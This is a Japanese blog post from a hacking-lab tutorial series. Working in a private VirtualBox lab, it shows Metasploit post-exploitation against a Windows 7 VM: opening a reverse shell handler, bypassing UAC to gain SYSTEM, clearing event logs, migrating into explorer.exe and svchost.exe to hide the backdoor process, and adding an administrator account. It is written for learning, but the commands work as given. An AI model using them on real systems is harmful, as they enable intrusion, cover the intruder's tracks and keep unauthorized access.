Go to Qiita Advent Calendar 2024 Top
LoginSignup
0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

More than 3 years have passed since last update.

@nakatatsu711

【ハッキング・ラボ⑧】Windows7をハッキングする〜隠蔽化〜

Last updated at Posted at 2021-08-13

Windows7に対して、ログ削除や隠蔽化等、侵入した形跡を消す方法を主に学んでいきます。


まとめ記事(①〜⑯をまとめてます)
【ハッキング・ラボのつくりかた】をやってみた

システム環境

仮想化ソフト:VirtualBox 6.1.0
ホストOS:Windows10
ゲストOS1:Kali Linux 2020.1
ゲストOS2:Windows7

攻撃端末はゲストOS1、ターゲット端末はゲストOS2です。
IPアドレスはゲストOS1が10.0.0.2、ゲストOS2が10.0.0.102です。

ログ削除

侵入すると、ログという形で形跡が残ってしまいます。
ここではログを削除する方法を学びます。

バックドアは既に設置しているので、Kali Linuxのmsfプロンプトで以下のコマンドを実行してリバースシェル接続を行います。

msf5
> use exploit/multi/handler
> set payload windows/meterpreter/reverse_tcp
> set LHOST 10.0.0.2
> exploit

UAC機能をバイパスし、SYSTEM権限を奪取します。
Meterpreterプロンプトから以下を実行します。
また、今回セッションを指定する場合はすべてセッション1を指定します。

msf5
> use exploit/windows/local/bypassuac
> set SESSION 1
> set payload windows/meterpreter/reverse_tcp
> set LHOST 10.0.0.2
> exploit
meterpreter
> getsystem -t 1

Windowsシステムのログはイベントログという形で記録されています。
イベントログはイベントビューアーで確認できます。

clearevコマンドを実行すると、Application、Security、Systemの3種類のイベントログが削除されます。

meterpreter
> clearev

隠蔽化

Windows7でタスクマネージャーを起動し、Processタブを表示します。

evil.exeを用いてリバースシェル接続していた場合、Processタブにevil.exeが存在します。
これでばれてしまう可能性があるため、evil.exeプロセスを隠蔽化して侵入がばれにくいようにします。

Meterpreterプロンプト上で実行します。

まず、psコマンドでWindows7で動作しているプロセスを表示します。

meterpreter
> ps

隠蔽化にはmigrateコマンドを使います。
psコマンドで調べたPIDをmigrateコマンドに指定します。
ただし、現在の権限以下のものを指定しないとエラーになります。
ここでは、explorer.exeを指定します。

meterpreter
> migrate explorer.exeのPID

migrateコマンドを実行すると、タスクマネージャーのProcessタブからevil.exeが消えます。

また、UAC機能をバイパスするモジュールを使用している場合、Processタブにはアルファベットの大文字小文字が混在した名前のexeファイルが表示されます。

これも隠蔽化します。
svchost.exeのPIDを指定し、migrateコマンドを実行すると、隠蔽化できます。

meterpreter
> migrate svchost.exeのPID

ユーザーの追加、編集、削除

ここではターゲット端末にユーザーを追加、編集、削除します。

事前にリバースシェル接続し、SYSTEM権限を奪取しておきます。

最初にコマンドプロンプトを立ち上げます。

meterpreter
> shell

元の状態は以下のようになっています。
hacking-lab-part8-1

testというユーザーを追加します。

meterpreter
> net user test/add
hacking-lab-part8-2

次にパスワードを変更(ここでは1234)し、管理者権限を与えます。

meterpreter
> net user test 1234
> net localgroup administrators test /add
hacking-lab-part8-3

ユーザーの削除は以下のようにします。

meterpreter
> net user test /delete

アプリのアンインストール

ここではターゲット端末からアプリをアンインストールする方法を学んでいきます。

事前にリバースシェル接続し、SYSTEM権限を奪取しておきます。

インストール済みのアプリを表示するにはアプリ列挙モジュールを使用します。

msf5
> use post/windows/gather/enum_applications
> set SESSION 1
> run

他には、wmic product get nameコマンドを使う方法もあります。
コマンドプロンプトを立ち上げ、以下を実行します。

meterpreter
> wmic product get name, installLocation

上記のいずれかの方法でアンインストールしたいアプリ名を確認した後、以下のコマンドを実行すればアプリをアンインストールできます。

meterpreter
> wmic product where name="アプリ名" call uninstall /nointeractive
0
0
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
Sign upLogin
0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?